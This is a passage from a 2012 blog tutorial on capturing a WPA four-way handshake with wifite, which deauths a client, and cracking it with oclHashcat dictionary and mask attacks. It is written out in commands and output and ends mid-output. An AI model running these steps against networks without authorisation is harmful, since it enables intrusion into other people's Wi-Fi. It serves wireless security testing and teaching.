{"id":504,"date":"2012-03-24T16:45:01","date_gmt":"2012-03-24T16:45:01","guid":{"rendered":"http:\/\/www.phillips321.co.uk\/?p=504"},"modified":"2012-03-24T16:45:01","modified_gmt":"2012-03-24T16:45:01","slug":"cracking-wpa-4way-handshakes-with-your-gpu","status":"publish","type":"post","link":"https:\/\/www.phillips321.co.uk\/2012\/03\/24\/cracking-wpa-4way-handshakes-with-your-gpu\/","title":{"rendered":"Cracking WPA 4way handshakes with your GPU!"},"content":{"rendered":"<p>We need to capture the WPA 4 way handshake in order to perform an offline GPU attack. For this demo we&#8217;ll be using an <a href=\"http:\/\/www.rfshop.co.uk\/active-wireless\/awus036h-alfa-awus036h-awuso36h-wireless-usb-adaptor-with-rp-sma-jack.html\" target=\"_blank\">Alfa AWUS036H wireless card<\/a> under <a href=\"http:\/\/www.backtrack-linux.org\/downloads\/\" target=\"_blank\">Backtrack 5 R2 64bit<\/a>.<\/p>\n<p><a href=\"http:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2012\/03\/wifite.png\"><img loading=\"lazy\" src=\"http:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2012\/03\/wifite-150x150.png\" alt=\"\" title=\"wifite\" width=\"150\" height=\"150\" class=\"aligncenter size-thumbnail wp-image-491\" \/><\/a><br \/>\nNow I could go in depth about capturing the WPA handshake manually using aircrack-ng but it has been <a href=\"http:\/\/aircrack-ng.org\/doku.php?id=cracking_wpa\" target=\"_blank\">covered in full<\/a> in many places already, so instead im going to use a great python tool call <a href=\"http:\/\/code.google.com\/p\/wifite\/\" target=\"_blank\">wifite<\/a> that automates the cracking process (it also supports automated WEP cracking using many types of attacks).<br \/>\nTo download it it&#8217;s a simple case of using <em>wget<\/em> \ud83d\ude42<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/><\/div><\/td><td><div class=\"bash codecolorer\"><span class=\"kw3\">cd<\/span> <span class=\"sy0\">\/<\/span>pentest<span class=\"sy0\">\/<\/span>wireless<span class=\"sy0\">\/<\/span><br \/>\n<span class=\"kw2\">wget<\/span> <span class=\"re5\">-O<\/span> wifite.py http:<span class=\"sy0\">\/\/<\/span>wifite.googlecode.com<span class=\"sy0\">\/<\/span>svn<span class=\"sy0\">\/<\/span>trunk<span class=\"sy0\">\/<\/span>wifite.py<br \/>\n<span class=\"kw2\">chmod<\/span> +x wifite.py<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>Wifite supports both command line and GUI based control, to be honest the command line use is that good I&#8217;ve never bothered with the GUI, here we&#8217;ll use the CLI.<br \/>\nThe following command tells wifite to only target the SSID &#8220;DLINK&#8221;, attempt WPA based attacks and as we&#8217;re not supplying the dictionary only the handshake will be captured and no automated cracking with pyrit will be attempted.<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;height:300px;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/>10<br \/>11<br \/>12<br \/>13<br \/>14<br \/>15<br \/>16<br \/>17<br \/>18<br \/>19<br \/>20<br \/>21<br \/>22<br \/>23<br \/>24<br \/>25<br \/>26<br \/>27<br \/>28<br \/>29<br \/>30<br \/>31<br \/><\/div><\/td><td><div class=\"bash codecolorer\">root<span class=\"sy0\">@<\/span>bt:<span class=\"sy0\">\/<\/span>pentest<span class=\"sy0\">\/<\/span>wireless<span class=\"co0\"># .\/wifite.py -e &quot;DLINK&quot; --no-wep --no-strip<\/span><br \/>\n&nbsp; .;<span class=\"st_h\">' &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; `;, &nbsp; &nbsp;<br \/>\n&nbsp;.;'<\/span> &nbsp;,;<span class=\"st_h\">' &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; `;, &nbsp;`;, &nbsp; WiFite r84<br \/>\n.;'<\/span> &nbsp;,;<span class=\"st_h\">' &nbsp;,;'<\/span> &nbsp; &nbsp; <span class=\"sy0\">`<\/span>;, &nbsp;<span class=\"sy0\">`<\/span>;, &nbsp;<span class=\"sy0\">`<\/span>;, &nbsp;<br \/>\n:: &nbsp; :: &nbsp; : &nbsp; <span class=\"br0\">&#40;<\/span> <span class=\"br0\">&#41;<\/span> &nbsp; : &nbsp; :: &nbsp; :: &nbsp;mass WEP<span class=\"sy0\">\/<\/span>WPA cracker<br \/>\n<span class=\"st_h\">':. &nbsp;'<\/span>:. &nbsp;<span class=\"st_h\">':. \/_\\ ,:'<\/span> &nbsp;,:<span class=\"st_h\">' &nbsp;,:'<\/span> &nbsp;<br \/>\n&nbsp;<span class=\"st_h\">':. &nbsp;'<\/span>:. &nbsp; &nbsp;<span class=\"sy0\">\/<\/span>___\\ &nbsp; &nbsp;,:<span class=\"st_h\">' &nbsp;,:'<\/span> &nbsp; designed <span class=\"kw1\">for<\/span> backtrack4<br \/>\n&nbsp; <span class=\"st_h\">':. &nbsp; &nbsp; &nbsp; \/_____\\ &nbsp; &nbsp; &nbsp;,:'<\/span> &nbsp; &nbsp; <br \/>\n&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class=\"sy0\">\/<\/span> &nbsp; &nbsp; &nbsp; \\ &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <br \/>\n<span class=\"br0\">&#91;<\/span>+<span class=\"br0\">&#93;<\/span> only scanning <span class=\"kw1\">for<\/span> WPA-encrypted networks<br \/>\n<span class=\"br0\">&#91;<\/span>+<span class=\"br0\">&#93;<\/span> wpa handshake stripping disabled<br \/>\n<span class=\"br0\">&#91;<\/span>+<span class=\"br0\">&#93;<\/span> searching <span class=\"kw1\">for<\/span> devices <span class=\"kw1\">in<\/span> monitor mode...<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">!<\/span><span class=\"br0\">&#93;<\/span> no wireless interfaces are <span class=\"kw1\">in<\/span> monitor mode<span class=\"sy0\">!<\/span><br \/>\n<span class=\"br0\">&#91;<\/span>+<span class=\"br0\">&#93;<\/span> <span class=\"kw1\">select<\/span> <span class=\"kw2\">which<\/span> device you want to put into monitor mode:<br \/>\n&nbsp; &nbsp; &nbsp; <span class=\"nu0\">1<\/span>. wlan0&nbsp; &nbsp; &nbsp; Realtek RTL8187L&nbsp; &nbsp; rtl8187 - <span class=\"br0\">&#91;<\/span>phy1<span class=\"br0\">&#93;<\/span><br \/>\n<span class=\"br0\">&#91;<\/span>+<span class=\"br0\">&#93;<\/span> <span class=\"kw1\">select<\/span> the wifi interface <span class=\"br0\">&#40;<\/span>between <span class=\"nu0\">1<\/span> and <span class=\"nu0\">1<\/span><span class=\"br0\">&#41;<\/span>: <span class=\"nu0\">1<\/span><br \/>\n<span class=\"br0\">&#91;<\/span>+<span class=\"br0\">&#93;<\/span> putting <span class=\"st0\">&quot;wlan0&quot;<\/span> into monitor mode...<br \/>\n<span class=\"br0\">&#91;<\/span>+<span class=\"br0\">&#93;<\/span> searching <span class=\"kw1\">for<\/span> devices <span class=\"kw1\">in<\/span> monitor mode...<br \/>\n<span class=\"br0\">&#91;<\/span>+<span class=\"br0\">&#93;<\/span> defaulting to interface <span class=\"st0\">&quot;mon0&quot;<\/span><br \/>\n<span class=\"br0\">&#91;<\/span>+<span class=\"br0\">&#93;<\/span> waiting <span class=\"kw1\">for<\/span> <span class=\"st0\">&quot;DLINK&quot;<\/span> to appear, press Ctrl+C to skip... &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br \/>\n<span class=\"br0\">&#91;<\/span>+<span class=\"br0\">&#93;<\/span> found <span class=\"st0\">&quot;DLINK&quot;<\/span>, waiting <span class=\"nu0\">1<\/span> sec <span class=\"kw1\">for<\/span> clients... &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <br \/>\n<span class=\"br0\">&#91;<\/span>+<span class=\"br0\">&#93;<\/span> <span class=\"kw1\">in<\/span> order to crack WPA, you will need to enter a dictionary <span class=\"kw2\">file<\/span><br \/>\n<span class=\"br0\">&#91;<\/span>+<span class=\"br0\">&#93;<\/span> enter the path to the dictionary to use, or <span class=\"st0\">&quot;none&quot;<\/span> to not crack at all:<br \/>\nnone<br \/>\n<span class=\"br0\">&#91;<\/span>+<span class=\"br0\">&#93;<\/span> estimated maximum <span class=\"kw3\">wait<\/span> <span class=\"kw1\">time<\/span> is 05 minutes<br \/>\n<span class=\"br0\">&#91;<\/span>+<span class=\"br0\">&#93;<\/span> attacking <span class=\"st0\">&quot;DLINK&quot;<\/span>...<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"nu0\">0<\/span>:05:00<span class=\"br0\">&#93;<\/span> starting wpa handshake capture<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"nu0\">0<\/span>:04:<span class=\"nu0\">54<\/span><span class=\"br0\">&#93;<\/span> added new client: <span class=\"nu0\">60<\/span>:C5:<span class=\"nu0\">47<\/span>:<span class=\"nu0\">72<\/span>:A5:<span class=\"nu0\">75<\/span>, total: <span class=\"nu0\">1<\/span> <br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"nu0\">0<\/span>:04:<span class=\"nu0\">51<\/span><span class=\"br0\">&#93;<\/span> sent <span class=\"nu0\">3<\/span> deauth packets; handshake captured<span class=\"sy0\">!<\/span> saved <span class=\"kw2\">as<\/span> <span class=\"st0\">&quot;hs\/DLINK.cap&quot;<\/span><br \/>\n<span class=\"br0\">&#91;<\/span>+<span class=\"br0\">&#93;<\/span> attack is complete: <span class=\"nu0\">1<\/span> handshake,<br \/>\nroot<span class=\"sy0\">@<\/span>bt:<span class=\"sy0\">\/<\/span>pentest<span class=\"sy0\">\/<\/span>wireless<span class=\"co0\">#<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>Sucessfull \ud83d\ude42 So the part we are interested in here is the DLINK.cap file. Confirm you have the handshake inside the capture file using the following command:<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/>10<br \/><\/div><\/td><td><div class=\"bash codecolorer\">root<span class=\"sy0\">@<\/span>bt:~<span class=\"sy0\">\/<\/span>Desktop<span class=\"co0\"># aircrack-ng DLINK.cap <\/span><br \/>\nOpening DLINK.cap<br \/>\nRead <span class=\"nu0\">1971<\/span> packets.<br \/>\n&nbsp; &nbsp;<span class=\"co0\"># &nbsp;BSSID &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;ESSID &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Encryption<\/span><br \/>\n&nbsp; &nbsp;<span class=\"nu0\">1<\/span> &nbsp;1C:AF:F7:<span class=\"nu0\">26<\/span>:<span class=\"nu0\">11<\/span>:AE &nbsp;DLINK &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; WPA <span class=\"br0\">&#40;<\/span><span class=\"nu0\">1<\/span> handshake<span class=\"br0\">&#41;<\/span><br \/>\nChoosing first network <span class=\"kw2\">as<\/span> target.<br \/>\nOpening DLINK.wifite.cap<br \/>\nPlease specify a dictionary <span class=\"br0\">&#40;<\/span>option -w<span class=\"br0\">&#41;<\/span>.<br \/>\nQuitting aircrack-ng...<br \/>\nroot<span class=\"sy0\">@<\/span>bt:~<span class=\"sy0\">\/<\/span>Desktop<span class=\"co0\">#<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>So you&#8217;ve gone to all the effort to capture the 4way handshake but you want to try and crack it using your GPU instead of using rainbow tables. Using the same 4way handshake from this post we will attempt to crack it using Hashcat.<\/p>\n<p>First of all we need to convert the pcap file into one that hashcat can understand, aircrack v1.1 can do this and it comes preinstalled in BT5r2. (Note: BT5r1 uses an older version that doesn&#8217;t allow creation of hccap files)<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;height:300px;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/>10<br \/>11<br \/>12<br \/>13<br \/>14<br \/>15<br \/>16<br \/>17<br \/>18<br \/>19<br \/>20<br \/>21<br \/>22<br \/>23<br \/>24<br \/>25<br \/>26<br \/>27<br \/>28<br \/>29<br \/>30<br \/>31<br \/>32<br \/><\/div><\/td><td><div class=\"bash codecolorer\">aircrack-ng DLINK.cap <span class=\"re5\">-J<\/span> DLINK<br \/>\nOpening DLINK.cap<br \/>\nRead <span class=\"nu0\">1971<\/span> packets.<br \/>\n&nbsp; &nbsp;<span class=\"co0\"># &nbsp;BSSID &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;ESSID &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Encryption<\/span><br \/>\n&nbsp; &nbsp;<span class=\"nu0\">1<\/span> &nbsp;1C:AF:F7:<span class=\"nu0\">26<\/span>:<span class=\"nu0\">11<\/span>:AE &nbsp;DLINK &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; WPA <span class=\"br0\">&#40;<\/span><span class=\"nu0\">1<\/span> handshake<span class=\"br0\">&#41;<\/span><br \/>\nChoosing first network <span class=\"kw2\">as<\/span> target.<br \/>\nOpening DLINK.wifite.cap<br \/>\nReading packets, please wait...<br \/>\nBuilding Hashcat <span class=\"br0\">&#40;<\/span><span class=\"nu0\">1.00<\/span><span class=\"br0\">&#41;<\/span> file...<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> ESSID <span class=\"br0\">&#40;<\/span>length: <span class=\"nu0\">5<\/span><span class=\"br0\">&#41;<\/span>: DLINK<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Key version: <span class=\"nu0\">2<\/span><br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> BSSID: 1C:AF:F7:<span class=\"nu0\">26<\/span>:<span class=\"nu0\">11<\/span>:AE<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> STA: <span class=\"nu0\">60<\/span>:C5:<span class=\"nu0\">47<\/span>:<span class=\"nu0\">72<\/span>:A5:<span class=\"nu0\">75<\/span><br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> anonce:<br \/>\n&nbsp; &nbsp; CF <span class=\"nu0\">50<\/span> 01 03 B5 <span class=\"nu0\">73<\/span> 08 B2 6A C2 AB 2C 07 DA <span class=\"nu0\">72<\/span> <span class=\"nu0\">52<\/span> <br \/>\n&nbsp; &nbsp; 0A C3 <span class=\"nu0\">21<\/span> <span class=\"nu0\">60<\/span> D2 C6 DE 5F 05 <span class=\"nu0\">93<\/span> 8D 08 D0 08 9A <span class=\"nu0\">46<\/span> <br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> snonce:<br \/>\n&nbsp; &nbsp; <span class=\"nu0\">55<\/span> <span class=\"nu0\">41<\/span> AB EA <span class=\"nu0\">41<\/span> 5F F5 02 AF D2 02 D7 D2 <span class=\"nu0\">84<\/span> 6B D8 <br \/>\n&nbsp; &nbsp; <span class=\"nu0\">42<\/span> <span class=\"nu0\">77<\/span> <span class=\"nu0\">27<\/span> <span class=\"nu0\">79<\/span> <span class=\"nu0\">77<\/span> <span class=\"nu0\">96<\/span> <span class=\"nu0\">43<\/span> 4F <span class=\"nu0\">34<\/span> F7 4F 7E 08 <span class=\"nu0\">17<\/span> <span class=\"nu0\">40<\/span> BA <br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Key MIC:<br \/>\n&nbsp; &nbsp; 0D FA B1 7E <span class=\"nu0\">28<\/span> BE 07 <span class=\"nu0\">15<\/span> <span class=\"nu0\">86<\/span> <span class=\"nu0\">37<\/span> 3D 9F 2D <span class=\"nu0\">12<\/span> A0 <span class=\"nu0\">18<\/span><br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> eapol:<br \/>\n&nbsp; &nbsp; 02 03 00 <span class=\"nu0\">75<\/span> 02 01 0A 00 <span class=\"nu0\">10<\/span> 00 00 00 00 00 00 00 <br \/>\n&nbsp; &nbsp; 01 <span class=\"nu0\">55<\/span> <span class=\"nu0\">41<\/span> AB EA <span class=\"nu0\">41<\/span> 5F F5 02 AF D2 02 D7 D2 <span class=\"nu0\">84<\/span> 6B <br \/>\n&nbsp; &nbsp; D8 <span class=\"nu0\">42<\/span> <span class=\"nu0\">77<\/span> <span class=\"nu0\">27<\/span> <span class=\"nu0\">79<\/span> <span class=\"nu0\">77<\/span> <span class=\"nu0\">96<\/span> <span class=\"nu0\">43<\/span> 4F <span class=\"nu0\">34<\/span> F7 4F 7E 08 <span class=\"nu0\">17<\/span> <span class=\"nu0\">40<\/span> <br \/>\n&nbsp; &nbsp; BA 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 <br \/>\n&nbsp; &nbsp; 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 <br \/>\n&nbsp; &nbsp; 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 <br \/>\n&nbsp; &nbsp; 00 00 <span class=\"nu0\">16<\/span> <span class=\"nu0\">30<\/span> <span class=\"nu0\">14<\/span> 01 00 00 0F AC 02 01 00 00 0F AC <br \/>\n&nbsp; &nbsp; 04 01 00 00 0F AC 02 0C 00 <br \/>\nSuccessfully written to DLINK.hccap<br \/>\nQuitting aircrack-ng...<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>Now it&#8217;s just a simple case of importing the new hccap file into hashcat. We&#8217;ll start of with a dictionary demo:<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;height:300px;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/>10<br \/>11<br \/>12<br \/>13<br \/>14<br \/>15<br \/>16<br \/>17<br \/>18<br \/>19<br \/>20<br \/>21<br \/>22<br \/>23<br \/>24<br \/>25<br \/>26<br \/>27<br \/>28<br \/>29<br \/>30<br \/>31<br \/>32<br \/><\/div><\/td><td><div class=\"bash codecolorer\">$ .<span class=\"sy0\">\/<\/span>oclHashcat-plus64.bin <span class=\"re5\">-m<\/span> <span class=\"nu0\">2500<\/span> DLINK.hccap darkc0de.lst <br \/>\noclHashcat-plus v0.07 by atom starting...<br \/>\nHashes: <span class=\"nu0\">1<\/span><br \/>\nUnique salts: <span class=\"nu0\">1<\/span><br \/>\nUnique digests: <span class=\"nu0\">1<\/span><br \/>\nBitmaps: <span class=\"nu0\">8<\/span> bits, <span class=\"nu0\">256<\/span> entries, 0x000000ff mask, <span class=\"nu0\">1024<\/span> bytes<br \/>\nRules: <span class=\"nu0\">1<\/span><br \/>\nGPU-Loops: <span class=\"nu0\">64<\/span><br \/>\nGPU-Accel: <span class=\"nu0\">16<\/span><br \/>\nPassword lengths range: <span class=\"nu0\">8<\/span> - <span class=\"nu0\">15<\/span><br \/>\nPlatform: AMD compatible platform found<br \/>\nWatchdog: Temperature limit <span class=\"kw1\">set<\/span> to 90c<br \/>\nDevice <span class=\"co0\">#1: Cayman, 2048MB, 0Mhz, 22MCU<\/span><br \/>\nDevice <span class=\"co0\">#1: Allocating 26MB host-memory<\/span><br \/>\nDevice <span class=\"co0\">#1: Kernel .\/kernels\/4098\/m2500.Cayman.64.kernel (1483607 bytes)<\/span><br \/>\nScanning dictionary darkc0de.lst: <span class=\"nu0\">1047587<\/span> bytes <span class=\"br0\">&#40;<\/span><span class=\"nu0\">5.83<\/span><span class=\"sy0\">%<\/span><span class=\"br0\">&#41;<\/span>, <span class=\"nu0\">95782<\/span> words,<br \/>\nScanned dictionary darkc0de.lst: <span class=\"nu0\">17975873<\/span> bytes, <span class=\"nu0\">1707659<\/span> words, <span class=\"nu0\">1707633<\/span> keyspace,<br \/>\nstarting attack...<br \/>\nDLINK:mysecret<br \/>\nStatus.......: Cracked<br \/>\nInput.Mode...: File <span class=\"br0\">&#40;<\/span>darkc0de.lst<span class=\"br0\">&#41;<\/span><br \/>\nHash.Target..: DLINK<br \/>\nHash.Type....: WPA<span class=\"sy0\">\/<\/span>WPA2<br \/>\nTime.Running.: <span class=\"nu0\">13<\/span> secs<br \/>\nTime.Util....: 13198.3ms<span class=\"sy0\">\/<\/span>189.8ms Real<span class=\"sy0\">\/<\/span>CPU, <span class=\"nu0\">1.5<\/span><span class=\"sy0\">%<\/span> idle<br \/>\nSpeed........: &nbsp; &nbsp;<span class=\"nu0\">67528<\/span> c<span class=\"sy0\">\/<\/span>s Real, &nbsp; &nbsp;<span class=\"nu0\">67776<\/span> c<span class=\"sy0\">\/<\/span>s GPU<br \/>\nRecovered....: <span class=\"nu0\">1<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">1<\/span> Digests, <span class=\"nu0\">1<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">1<\/span> Salts<br \/>\nProgress.....: <span class=\"nu0\">1507780<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">1707633<\/span> <span class=\"br0\">&#40;<\/span><span class=\"nu0\">88.30<\/span><span class=\"sy0\">%<\/span><span class=\"br0\">&#41;<\/span><br \/>\nRejected.....: <span class=\"nu0\">616522<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">1507780<\/span> <span class=\"br0\">&#40;<\/span><span class=\"nu0\">40.89<\/span><span class=\"sy0\">%<\/span><span class=\"br0\">&#41;<\/span><br \/>\n<span class=\"co4\">HW.Monitor.#<\/span><span class=\"nu0\">1<\/span>: <span class=\"nu0\">89<\/span><span class=\"sy0\">%<\/span> GPU, 56c Temp<br \/>\nStarted: Fri Mar <span class=\"nu0\">23<\/span> <span class=\"nu0\">18<\/span>:<span class=\"nu0\">46<\/span>:<span class=\"nu0\">36<\/span> <span class=\"nu0\">2012<\/span><br \/>\nStopped: Fri Mar <span class=\"nu0\">23<\/span> <span class=\"nu0\">18<\/span>:<span class=\"nu0\">46<\/span>:<span class=\"nu0\">49<\/span> <span class=\"nu0\">2012<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>And now a bruteforce demo using an 8char lowercase password:<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;height:300px;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/>10<br \/>11<br \/>12<br \/>13<br \/>14<br \/>15<br \/>16<br \/>17<br \/>18<br \/>19<br \/>20<br \/>21<br \/>22<br \/>23<br \/>24<br \/>25<br \/>26<br \/>27<br \/>28<br \/><\/div><\/td><td><div class=\"bash codecolorer\">$ .<span class=\"sy0\">\/<\/span>oclHashcat-plus64.bin <span class=\"re5\">-a<\/span> <span class=\"nu0\">3<\/span> <span class=\"re5\">-m<\/span> <span class=\"nu0\">2500<\/span> DLINK.hccap ?l?l?l?l?l?l?l?l<br \/>\noclHashcat-plus v0.07 by atom starting...<br \/>\nHashes: <span class=\"nu0\">1<\/span><br \/>\nUnique salts: <span class=\"nu0\">1<\/span><br \/>\nUnique digests: <span class=\"nu0\">1<\/span><br \/>\nBitmaps: <span class=\"nu0\">8<\/span> bits, <span class=\"nu0\">256<\/span> entries, 0x000000ff mask, <span class=\"nu0\">1024<\/span> bytes<br \/>\nGPU-Loops: <span class=\"nu0\">64<\/span><br \/>\nGPU-Accel: <span class=\"nu0\">16<\/span><br \/>\nPassword lengths range: <span class=\"nu0\">8<\/span> - <span class=\"nu0\">15<\/span><br \/>\nPlatform: AMD compatible platform found<br \/>\nWatchdog: Temperature limit <span class=\"kw1\">set<\/span> to 90c<br \/>\nDevice <span class=\"co0\">#1: Cayman, 2048MB, 0Mhz, 22MCU<\/span><br \/>\nDevice <span class=\"co0\">#1: Allocating 26MB host-memory<\/span><br \/>\nDevice <span class=\"co0\">#1: Kernel .\/kernels\/4098\/m2500.Cayman.64.kernel (1483607 bytes)<\/span><br \/>\nStatus.......: Aborted<br \/>\nInput.Mode...: Mask <span class=\"br0\">&#40;<\/span>?l?l?l?l?l?l?l?l<span class=\"br0\">&#41;<\/span><br \/>\nHash.Target..: DLINK<br \/>\nHash.Type....: WPA<span class=\"sy0\">\/<\/span>WPA2<br \/>\nTime.Running.: <span class=\"nu0\">6<\/span> secs<br \/>\nTime.Left....: <span class=\"nu0\">36<\/span> days, <span class=\"nu0\">14<\/span> hours<br \/>\nTime.Util....: 6108.4ms<span class=\"sy0\">\/<\/span>87.0ms Real<span class=\"sy0\">\/<\/span>CPU, <span class=\"nu0\">1.4<\/span><span class=\"sy0\">%<\/span> idle<br \/>\nSpeed........: &nbsp; &nbsp;<span class=\"nu0\">66385<\/span> c<span class=\"sy0\">\/<\/span>s Real, &nbsp; &nbsp;<span class=\"nu0\">74004<\/span> c<span class=\"sy0\">\/<\/span>s GPU<br \/>\nRecovered....: <span class=\"nu0\">0<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">1<\/span> Digests, <span class=\"nu0\">0<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">1<\/span> Salts<br \/>\nProgress.....: <span class=\"nu0\">405504<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">208827064576<\/span> <span class=\"br0\">&#40;<\/span><span class=\"nu0\">0.00<\/span><span class=\"sy0\">%<\/span><span class=\"br0\">&#41;<\/span><br \/>\nRejected.....: <span class=\"nu0\">0<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">405504<\/span> <span class=\"br0\">&#40;<\/span><span class=\"nu0\">0.00<\/span><span class=\"sy0\">%<\/span><span class=\"br0\">&#41;<\/span><br \/>\n<span class=\"co4\">HW.Monitor.#<\/span><span class=\"nu0\">1<\/span>: <span class=\"nu0\">90<\/span><span class=\"sy0\">%<\/span> GPU, 58c Temp<br \/>\nStarted: Fri Mar <span class=\"nu0\">23<\/span> <span class=\"nu0\">18<\/span>:<span class=\"nu0\">40<\/span>:<span class=\"nu0\">25<\/span> <span class=\"nu0\">2012<\/span><br \/>\nStopped: Fri Mar <span class=\"nu0\">23<\/span> <span class=\"nu0\">18<\/span>:<span class=\"nu0\">40<\/span>:<span class=\"nu0\">31<\/span> <span class=\"nu0\">2012<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>Ouch, that&#8217;s going to take ages, 36days, no thanks! To save time in the testing I&#8217;ve limited that char set chacraters to c, e, m, r, s, t &#038; y as we know the password already and I dont like the sound of leaving it running that long and burning out my GPU!<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;height:300px;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/>10<br \/>11<br \/>12<br \/>13<br \/>14<br \/>15<br \/>16<br \/>17<br \/>18<br \/>19<br \/>20<br \/>21<br \/>22<br \/>23<br \/>24<br \/>25<br \/>26<br \/>27<br \/>28<br \/><\/div><\/td><td><div class=\"bash codecolorer\">$ .<span class=\"sy0\">\/<\/span>oclHashcat-plus64.bin <span class=\"re5\">-a<\/span> <span class=\"nu0\">3<\/span> <span class=\"re5\">-m<\/span> <span class=\"nu0\">2500<\/span> DLINK.hccap <span class=\"re5\">-1<\/span> cemrsty ?<span class=\"nu0\">1<\/span>?<span class=\"nu0\">1<\/span>?<span class=\"nu0\">1<\/span>?<span class=\"nu0\">1<\/span>?<span class=\"nu0\">1<\/span>?<span class=\"nu0\">1<\/span>?<span class=\"nu0\">1<\/span>?<span class=\"nu0\">1<\/span><br \/>\noclHashcat-plus v0.07 by atom starting...<br \/>\nHashes: <span class=\"nu0\">1<\/span><br \/>\nUnique salts: <span class=\"nu0\">1<\/span><br \/>\nUnique digests: <span class=\"nu0\">1<\/span><br \/>\nBitmaps: <span class=\"nu0\">8<\/span> bits, <span class=\"nu0\">256<\/span> entries, 0x000000ff mask, <span class=\"nu0\">1024<\/span> bytes<br \/>\nGPU-Loops: <span class=\"nu0\">64<\/span><br \/>\nGPU-Accel: <span class=\"nu0\">16<\/span><br 